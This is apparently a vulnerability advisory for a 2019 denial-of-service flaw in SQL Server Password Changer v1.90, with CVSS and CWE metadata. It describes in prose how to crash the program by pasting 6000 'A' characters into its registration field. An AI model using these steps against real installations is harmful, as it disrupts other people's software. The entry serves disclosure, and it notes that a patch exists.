Vendor: SQL Server Password Changer
By: Velayutham Selvaraj & Praveen Thiyagarayam (TwinTech Solutions)
CVSS: 7.8 (HIGH)
Denial of Service
CWE: 400
Product Name: SQL Server Password Changer
Affected Version From: v1.90
Affected Version To: v2.10
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 8 x64, Windows 7 x64
2019
SQL Server Password Changer v1.90 Denial of Service Exploit
A denial of service vulnerability exists in SQL Server Password Changer v1.90: entering a maliciously crafted User Name and Registration Code into the application causes it to crash. An attacker can exploit this vulnerability by running a Python script to create a file containing 6000 bytes of '\x41' characters, copying the content of the file to the clipboard, opening SQL Server Password Changer and clicking 'EnterKey', pasting the content of the file into the 'User Name and Registration Code' field, and clicking 'OK' to trigger the crash.
Mitigation:
The vendor has released a patch to address this vulnerability.